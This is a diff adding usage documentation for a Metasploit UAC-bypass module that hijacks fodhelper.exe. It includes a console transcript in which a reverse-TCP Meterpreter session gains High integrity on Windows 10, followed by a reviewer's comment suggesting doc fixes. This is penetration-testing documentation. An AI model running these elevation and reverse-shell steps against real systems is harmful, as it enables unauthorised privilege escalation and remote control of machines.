| 1 | +## Intro |
| 2 | + |
| 3 | + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under |
| 4 | + the current user hive, and inserting a custom command that will get invoked when |
| 5 | + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC |
| 6 | + flag turned off. |
| 7 | + |
| 8 | + This module modifies a registry key, but cleans up the key once the payload has |
| 9 | + been invoked. |
| 10 | + |
| 11 | + The module does not require the architecture of the payload to match the OS. If |
| 12 | + specifying EXE::Custom your DLL should call ExitProcess() after starting your |
| 13 | + payload in a separate process. |
| 14 | + |
| 15 | +## Usage |
| 16 | + |
| 17 | + You'll first need to obtain a session on the target system. |
| 18 | + Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. |
| 19 | + |
| 20 | + |
| 21 | +##Scenario |
| 22 | + |
| 23 | + |
| 24 | +``` |
| 25 | +msf > |
| 26 | +[*] Sending stage (1189423 bytes) to 192.168.50.4 |
| 27 | +[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100 |
| 28 | +
|
| 29 | +msf > sessions -i 11 |
| 30 | +[*] Starting interaction with 11... |
| 31 | +
|
| 32 | +meterpreter > shell |
| 33 | +Process 9496 created. |
| 34 | +Channel 1 created. |
| 35 | +Microsoft Windows [Version 10.0.14393] |
| 36 | +(c) 2016 Microsoft Corporation. All rights reserved. |
| 37 | +
|
| 38 | +C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label" |
| 39 | +whoami /all | findstr /C:"Mandatory Label" |
| 40 | +Mandatory Label\Medium Mandatory Level Label S-1-16-8192 |
| 41 | +
|
| 42 | +C:\Users\sasha\Desktop>exit |
| 43 | +exit |
| 44 | +meterpreter > |
| 45 | +Background session 11? [y/N] |
| 46 | +msf > use exploit/windows/local/bypassuac_fodhelper |
| 47 | +msf exploit(bypassuac_fodhelper) > set SESSION 11 |
| 48 | +SESSION => 11 |
| 49 | +msf exploit(bypassuac_fodhelper) > show targets |
| 50 | +
|
| 51 | +Exploit targets: |
| 52 | +
|
| 53 | + Id Name |
| 54 | + -- ---- |
| 55 | + 0 Windows x86 |
| 56 | + 1 Windows x64 |
| 57 | +
|
| 58 | +
|
| 59 | +msf exploit(bypassuac_fodhelper) > set target 0 |
| 60 | +target => 0 |
| 61 | +msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp |
| 62 | +payload => windows/meterpreter/reverse_tcp |
| 63 | +msf exploit(bypassuac_fodhelper) > run |
| 64 | +
|
| 65 | +[*] Started reverse TCP handler on 192.168.50.1:4445 |
| 66 | +[*] UAC is Enabled, checking level... |
| 67 | +[+] Part of Administrators group! Continuing... |
| 68 | +[+] UAC is set to Default |
| 69 | +[+] BypassUAC can bypass this setting, continuing... |
| 70 | +[*] Configuring payload and stager registry keys ... |
| 71 | +[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe |
| 72 | +[*] Sending stage (957487 bytes) to 192.168.50.4 |
| 73 | +[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100 |
| 74 | +[*] Cleaining up registry keys ... |
| 75 | +
|
| 76 | +meterpreter > shell |
| 77 | +Process 4076 created. |
| 78 | +Channel 1 created. |
| 79 | +Microsoft Windows [Version 10.0.14393] |
| 80 | +(c) 2016 Microsoft Corporation. All rights reserved. |
| 81 | +
|
| 82 | +C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label" |
| 83 | +whoami /all | findstr /C:"Mandatory Label" |
| 84 | +ERROR: Unable to get user claims information. |
| 85 | +Mandatory Label\High Mandatory Level Label S-1-16-12288 |
| 86 | +
|
| 87 | +C:\WINDOWS\system32> |
| 88 | +
|
| 89 | +``` |
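Review bot: the Usage section (lines 17-18) understates the preconditions that the module's own output in the Scenario checks for. The run shows the module verifying "Part of Administrators group!" and "UAC is set to Default" before it touches the registry, so Usage should say that the session must belong to a user who is a member of the local Administrators group and that UAC must be at a level the module can bypass (the Default level is shown working), rather than "one simply needs to set the payload and session options". In the Intro, "a special key in the Registry under the current user hive" (line 3) should name the key the module writes and cleans up, since a reader verifying or detecting this technique needs the exact path; and "a second shell that has the UAC flag turned off" (lines 5-6) would be more accurate as "an elevated (High integrity level) session", which is what the two `whoami /all | findstr /C:"Mandatory Label"` checks in the Scenario demonstrate (Medium Mandatory Level before, High Mandatory Level after). The EXE::Custom sentence (lines 12-13) refers to "your DLL", which does not match the option name and reads as copied from another module's description; state which binary is meant. Markdown nits: `##Scenario` (line 21) lacks the space after `##` that the other headings use, so it will not render as a heading, and `payload` and `session` on line 18 are wrapped in triple backticks where single backticks are intended. The "Cleaining up registry keys" line in the captured output is the module's own typo, reproduced verbatim here; it is fine in the doc but worth fixing in the module's print statement.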